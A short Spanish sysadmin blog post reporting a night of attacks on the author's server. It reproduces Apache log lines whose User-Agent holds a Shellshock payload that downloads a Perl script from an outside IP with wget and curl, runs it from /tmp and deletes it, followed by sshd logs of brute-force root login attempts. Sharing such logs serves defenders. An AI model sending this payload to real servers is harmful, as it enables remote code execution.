Bofhers

Otra vez shellshock

8 enero, 2015
bjone

Hacia muchos dias que no intentaban explotar shellshock, anoche estuvieron dando caña al server durante un par de horas…


18.78.214.9 – – [06/Jan/2015:22:55:45 +0100] «GET /cgi-bin/recent.cgi HTTP/1.1» 404 323 «-» «() { :;};/usr/bin/perl -e ‘print \»Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\»;system(\»wget http://210.230.186.9/icons/guide/tst.pl -O /tmp/b.pl;curl -O /tmp/b.pl http://210.230.186.9/icons/guide/tst.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\»);'»
218.78.214.9 – – [06/Jan/2015:22:55:40 +0100] «GET /cgi-bin/php5 HTTP/1.1» 404 323 «-» «() { :;};/usr/bin/perl -e ‘print \»Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\»;system(\»wget http://210.230.186.9/icons/guide/tst.pl -O /tmp/b.pl;curl -O /tmp/b.pl http://210.230.186.9/icons/guide/tst.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\»);'»
218.78.214.9 – – [06/Jan/2015:22:55:40 +0100] «GET /cgi-bin/php4 HTTP/1.1» 404 323 «-» «() { :;};/usr/bin/perl -e ‘print \»Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\»;system(\»wget http://210.230.186.9/icons/guide/tst.pl -O /tmp/b.pl;curl -O /tmp/b.pl http://210.230.186.9/icons/guide/tst.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\»);'»
218.78.214.9 – – [06/Jan/2015:22:55:39 +0100] «GET /cgi-bin/php HTTP/1.1» 404 323 «-» «() { :;};/usr/bin/perl -e ‘print \»Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\»;system(\»wget http://210.230.186.9/icons/guide/tst.pl -O /tmp/b.pl;curl -O /tmp/b.pl http://210.230.186.9/icons/guide/tst.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\»);'»
218.78.214.9 – – [06/Jan/2015:22:55:35 +0100] «GET /cgi-bin/main.cgi HTTP/1.1» 404 323 «-» «() { :;};/usr/bin/perl -e ‘print \»Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\»;system(\»wget http://210.230.186.9/icons/guide/tst.pl -O /tmp/b.pl;curl -O /tmp/b.pl http://210.230.186.9/icons/guide/tst.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\»);'»

Y de esto si que hacia tiempo … ataques por fuerza bruta al ssh

an 6 08:07:11 ks38032 sshd[7677]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.21.207 user=root
Jan 6 08:07:04 ks38032 sshd[7675]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.21.207 user=root
Jan 6 08:06:57 ks38032 sshd[7630]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.21.207 user=root
Jan 6 08:06:50 ks38032 sshd[7628]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.21.207 user=root
Jan 6 08:06:43 ks38032 sshd[7626]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.21.207 user=root
Jan 6 08:06:36 ks38032 sshd[7622]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.21.207 user=root
Jan 6 08:06:29 ks38032 sshd[7620]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.21.207 user=root
Jan 6 08:06:21 ks38032 sshd[7618]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.21.207 user=root

an 6 08:00:49 ks38032 sshd[7229]: Failed password for invalid user root from 222.186.21.207 port 4450 ssh2
Jan 6 08:00:44 ks38032 sshd[7227]: Failed password for invalid user root from 222.186.21.207 port 3361 ssh2
Jan 6 08:00:42 ks38032 sshd[7227]: Failed password for invalid user root from 222.186.21.207 port 3361 ssh2
Jan 6 08:00:37 ks38032 sshd[7225]: Failed password for invalid user root from 222.186.21.207 port 2299 ssh2
Jan 6 08:00:35 ks38032 sshd[7225]: Failed password for invalid user root from 222.186.21.207 port 2299 ssh2
Jan 6 08:00:30 ks38032 sshd[7219]: Failed password for invalid user root from 222.186.21.207 port 1431 ssh2
Jan 6 08:00:28 ks38032 sshd[7219]: Failed password for invalid user root from 222.186.21.207 port 1431 ssh2
Jan 6 08:00:24 ks38032 sshd[7213]: Failed password for invalid user root from 222.186.21.207 port 4538 ssh2

Noche movidita …